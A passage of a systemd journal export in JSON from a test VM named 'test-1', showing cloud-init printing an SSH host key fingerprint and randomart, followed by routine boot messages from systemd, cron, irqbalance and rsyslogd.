"cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "SHA256:LGSFwDAA7B9jve87IoPLkG3UGaAwTRLkJQeTPTX2mWw root@test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c3;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=547039c05140533d", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "The key's randomart image is:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c4;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=d5b5481a3afeba41", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+--[ED25519 256]--+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c5;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=3e5a8ac5210aedd6", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|@XO=o= .. |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c6;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=f5fbc907c61aa5b1", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o**=o =.o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c7;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=b7315a6e7d8d6822", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o. + oE |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c8;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=198e39844a6fea32", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| . = *.. |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2c9;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=c32fc07777cefd49", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + = o S |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ca;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=8336df269661001a", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| + . . . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cb;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=1ca725f94f5f57a0", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|o + . |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cc;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=60dd92c320805416", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "|oo o . o |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cd;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=92ed6654ceb9e458", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "| o. o ooo |" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ce;b=e2b08827b5804427b422c10c84f1567e;m=2971523;t=5bd16df5a948b;x=bd50657e96b79a01", "__REALTIME_TIMESTAMP" : "1615280817738891", "__MONOTONIC_TIMESTAMP" : "43455779", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "SYSLOG_IDENTIFIER" : "cloud-init", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_HOSTNAME" : "test-1", "_STREAM_ID" : "40403fee483a4d489c2caed70dc8bf22", "_PID" : "635", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init.service", "_SYSTEMD_UNIT" : "cloud-init.service", "_SYSTEMD_INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "+----[SHA256]-----+" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2cf;b=e2b08827b5804427b422c10c84f1567e;m=2a5be59;t=5bd16df693dc1;x=a21ce3aac33b82b6", "__REALTIME_TIMESTAMP" : "1615280818699713", "__MONOTONIC_TIMESTAMP" : "44416601", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "_HOSTNAME" : "test-1", "_SOURCE_MONOTONIC_TIMESTAMP" : "43924614", "MESSAGE" : "new mount options do not match the existing superblock, will be ignored" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d0;b=e2b08827b5804427b422c10c84f1567e;m=2a5bff9;t=5bd16df693f60;x=edb88feae3407441", "__REALTIME_TIMESTAMP" : "1615280818700128", "__MONOTONIC_TIMESTAMP" : "44417017", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "cloud-init.service", "INVOCATION_ID" : "b3efcb2e3851424da5dc1431c0eec1fe", "MESSAGE" : "Started Initial cloud-init job (metadata service crawler).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817868317" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d1;b=e2b08827b5804427b422c10c84f1567e;m=2a5c692;t=5bd16df6945f9;x=c1ed6e345db6ff96", "__REALTIME_TIMESTAMP" : "1615280818701817", "__MONOTONIC_TIMESTAMP" : "44418706", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "SYSLOG_IDENTIFIER" : "cron", "SYSLOG_PID" : "777", "MESSAGE" : "(CRON) INFO (pidfile fd = 3)", "_PID" : "777", "_COMM" : "cron", "_EXE" : "/usr/sbin/cron", "_CMDLINE" : "/usr/sbin/cron -f", "_SYSTEMD_CGROUP" : "/system.slice/cron.service", "_SYSTEMD_UNIT" : "cron.service", "_SYSTEMD_INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818087625" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d2;b=e2b08827b5804427b422c10c84f1567e;m=2a5cf41;t=5bd16df694ea8;x=9950e60fc01aa9cd", "__REALTIME_TIMESTAMP" : "1615280818704040", "__MONOTONIC_TIMESTAMP" : "44420929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network is Online.", "UNIT" : "network-online.target", "INVOCATION_ID" : "4d22c778885949648c8d9a9eb1486c98", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817876257" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d3;b=e2b08827b5804427b422c10c84f1567e;m=2a5cfba;t=5bd16df694f21;x=8bd8695305210409", "__REALTIME_TIMESTAMP" : "1615280818704161", "__MONOTONIC_TIMESTAMP" : "44421050", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "SYSLOG_IDENTIFIER" : "cron", "SYSLOG_PID" : "777", "_PID" : "777", "_COMM" : "cron", "_EXE" : "/usr/sbin/cron", "_CMDLINE" : "/usr/sbin/cron -f", "_SYSTEMD_CGROUP" : "/system.slice/cron.service", "_SYSTEMD_UNIT" : "cron.service", "_SYSTEMD_INVOCATION_ID" : "639ae62205e749a080eec1bd83ca7856", "MESSAGE" : "(CRON) INFO (Running @reboot jobs)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818107817" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d4;b=e2b08827b5804427b422c10c84f1567e;m=2a5d1e9;t=5bd16df695151;x=4db369ca3a42343e", "__REALTIME_TIMESTAMP" : "1615280818704721", "__MONOTONIC_TIMESTAMP" : "44421609", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Availability of block devices...", "UNIT" : "blk-availability.service", "INVOCATION_ID" : "cc006751d3f34c1a8252273d8ffc9cdf", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817886457" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d5;b=e2b08827b5804427b422c10c84f1567e;m=2a5d25e;t=5bd16df6951c5;x=371ffaea4bdf3918", "__REALTIME_TIMESTAMP" : "1615280818704837", "__MONOTONIC_TIMESTAMP" : "44421726", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "4", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "/usr/sbin/irqbalance", "MESSAGE" : "Balancing is ineffective on systems with a single cpu. Shutting down", "_PID" : "782", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818187602" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d6;b=e2b08827b5804427b422c10c84f1567e;m=2a5d5e2;t=5bd16df69554a;x=544700d31beb3d6a", "__REALTIME_TIMESTAMP" : "1615280818705738", "__MONOTONIC_TIMESTAMP" : "44422626", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Remote File Systems (Pre).", "UNIT" : "remote-fs-pre.target", "INVOCATION_ID" : "a4fe2657835244df874ebd49c332eb72", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817892939" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d7;b=e2b08827b5804427b422c10c84f1567e;m=2a5d657;t=5bd16df6955be;x=197acb999049c61f", "__REALTIME_TIMESTAMP" : "1615280818705854", "__MONOTONIC_TIMESTAMP" : "44422743", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "MESSAGE" : "imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd. [v8.32.0]", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301187" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d8;b=e2b08827b5804427b422c10c84f1567e;m=2a5dad1;t=5bd16df695a38;x=d1561caffd4754f8", "__REALTIME_TIMESTAMP" : "1615280818707000", "__MONOTONIC_TIMESTAMP" : "44423889", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Remote File Systems.", "UNIT" : "remote-fs.target", "INVOCATION_ID" : "a3e41334d93141efa0b57ed8ea417097", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817901028" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2d9;b=e2b08827b5804427b422c10c84f1567e;m=2a5dbc7;t=5bd16df695b2f;x=d8bf11f61bdd7d75", "__REALTIME_TIMESTAMP" : "1615280818707247", "__MONOTONIC_TIMESTAMP" : "44424135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "5", "SYSLOG_IDENTIFIER" : "rsyslogd", "_PID" : "783", "_UID" : "102", "_GID" : "106", "_COMM" : "rsyslogd", "_EXE" : "/usr/sbin/rsyslogd", "_CMDLINE" : "/usr/sbin/rsyslogd -n", "_CAP_EFFECTIVE" : "0", "_SYSTEMD_CGROUP" : "/system.slice/rsyslog.service", "_SYSTEMD_UNIT" : "rsyslog.service", "_SYSTEMD_INVOCATION_ID" : "562da32e4e8641b99bedbe865c51feea", "MESSAGE" : "rsyslogd's groupid changed to 106", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818301195" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2da;b=e2b08827b5804427b422c10c84f1567e;m=2a5df4a;t=5bd16df695eb1;x=389021366b3d61c8", "__REALTIME_TIMESTAMP" : "1615280818708145", "__MONOTONIC_TIMESTAMP" : "44425034", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" 